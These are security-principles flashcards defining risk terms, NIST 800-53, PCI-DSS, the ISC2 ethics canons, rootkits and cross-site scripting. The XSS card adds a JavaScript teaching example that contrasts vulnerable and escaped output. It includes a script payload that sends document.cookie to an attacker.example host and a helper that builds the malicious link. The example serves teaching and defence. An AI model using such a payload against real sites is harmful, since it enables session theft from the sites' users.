Chapter 1: Security Principles Flashcards
Vulnerability
Weakness in an information system, system security procedures, internal controls or implementation that could be exploited by a threat source.
Risk
A measure of the extent to which an entity is threatened by a potential circumstance or event.
Threat
Any circumstance or event with the potential to adversely impact organisational operations (including mission, functions, image or reputation), organisational assets, individuals, other organisations or the nation through an information system via unauthorised access, destruction, disclosure, modification of information and/or denial of service.
Threat Vector
The means by which a threat actor carries out their objectives.
Risk Likelihood
The probability that a risk event will occur.
Risk Impact
Risk impact is the potential consequence or damage that a problem can cause if it occurs. It can be measured in terms of financial loss, operational disruption, customer dissatisfaction, reputation damage, legal liability, or any other relevant metric.
Risk Identification
Risk identification (RI) is a set of activities that detect, describe and catalogue all potential risks to assets and processes that could negatively impact business outcomes in terms of performance, quality, damage, loss or reputation.
Risk Acceptance
Determining that the potential benefits of a business function outweigh the possible risk impact/likelihood and performing that business function with no other action.
Risk Avoidance
Determining that the impact and/or likelihood of a specific risk is too great to be offset by the potential benefits and not performing a certain business function because of that determination.
Risk Transference
Paying an external party to accept the financial impact of a given risk.
Security Controls
Safeguards or countermeasures that reduce the likelihood of a threat materialising, or mitigate its impact if it does.
NIST 800-53
The NIST Special Publication 800-53, Security and Privacy Controls for Information Systems and Organisations is a set of recommended security and privacy controls for federal information systems and organisations to help meet the Federal Information Security Management Act (FISMA) requirements.
PCI-DSS
The PCI DSS (Payment Card Industry Data Security Standard) is an information security standard designed to reduce payment card fraud by increasing security controls around cardholder data.
Cost/Benefit Analysis
A cost-benefit analysis is a systematic process that businesses use to analyse which decisions to make and which to forgo.
Risk Appetite
Risk appetite is the level of risk that an organisation is willing to accept while pursuing its objectives, and before any action is determined to be necessary in order to reduce the risk.
ISC2 Code of Ethics Canons
- Protect society, the common good, necessary public trust and confidence and the infrastructure
- Act honorably, honestly, justly, responsibly and legally
- Provide diligent and competent service to principals
- Advance and protect the profession
Risk Tolerance
The level of risk or degree of uncertainty that is acceptable to organisations. The organisation’s or stakeholder’s readiness to bear the remaining risk after risk response in order to achieve its objectives, with the consideration that such tolerance can be influenced by legal or regulatory requirements.
Rootkits
A rootkit is software used by attackers to gain and keep privileged control over a target computer or network. It can appear as a single program but is often a collection of tools that together give the attacker administrator-level (root) control over the device.
A rootkit tries to maintain that root-level access while concealing the malicious activity: it typically installs a backdoor and hides its own files, processes and network connections from users and anti-malware software. Because it runs with the highest privileges, it can subvert the very system components that would otherwise detect it.
Cross-Site Scripting
Cross-site scripting (XSS) is an attack in which an attacker injects malicious script into pages served by a trusted application or website, so that the script runs in the victim's browser with the trust (origin, cookies, session) of that site. In the reflected variant, attackers often start the attack by sending a victim a crafted link to the trusted site and enticing them to click it; in the stored variant the payload is saved by the site (for example in a comment) and served to every visitor without any link being sent.
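The reflected variant described above, as an added example that is not part of the original flashcards: a hypothetical search page at shop.example echoes the q parameter into its HTML, first unescaped (vulnerable) and then escaped for the HTML context (hardened). The hostnames, function names and payload are all constructed for this illustration.

```javascript
// Added example (not part of the original flashcards): a reflected XSS bug
// and its fix, in a hypothetical search page that echoes the "q" parameter.
// The site and attacker hostnames below are placeholders.

// Escape the five characters that are significant in an HTML text or
// attribute context. Other contexts (inside <script>, in a URL, in CSS)
// need their own, different encoders.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the untrusted query string is concatenated straight into markup,
// so whatever the user (or the attacker's link) supplies becomes part of the page.
function renderResultsVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: the same template, but every untrusted value is escaped for the
// HTML context it lands in before it is concatenated.
function renderResultsSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Build the link an attacker would send the victim. The payload is
// URL-encoded so it survives the trip through the query string and is
// decoded back to raw HTML by the server before rendering.
function buildMaliciousLink(baseUrl, payload) {
  return `${baseUrl}/search?q=${encodeURIComponent(payload)}`;
}

// Recover the raw "q" value the way a server would (WHATWG URL API).
function extractQuery(link) {
  return new URL(link).searchParams.get("q");
}

// Crude indicator used only in this demo: does the rendered HTML still
// contain an executable <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload: exfiltrate the session cookie to an attacker-controlled host.
const PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

function demo() {
  const link = buildMaliciousLink("https://shop.example", PAYLOAD);
  const q = extractQuery(link);
  return {
    link,
    vulnerable: renderResultsVulnerable(q),
    safe: renderResultsSafe(q),
    vulnerableExecutes: containsScriptTag(renderResultsVulnerable(q)),
    safeExecutes: containsScriptTag(renderResultsSafe(q)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Two practical caveats. Output encoding is context-specific: escapeHtml is correct only for HTML text and quoted attribute values, and a value placed inside a script block, a URL or an event handler attribute needs a different encoder (or, better, a templating engine that encodes by context). Encoding is also only one layer; a restrictive Content-Security-Policy and HttpOnly session cookies limit what an injected script can do if one slips through.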
Risk Management
Cybersecurity risk management is an ongoing process of identifying, analysing, evaluating, and addressing your organisation’s cybersecurity threats. Cybersecurity risk management isn’t simply the job of the security team; everyone in the organisation has a role to play.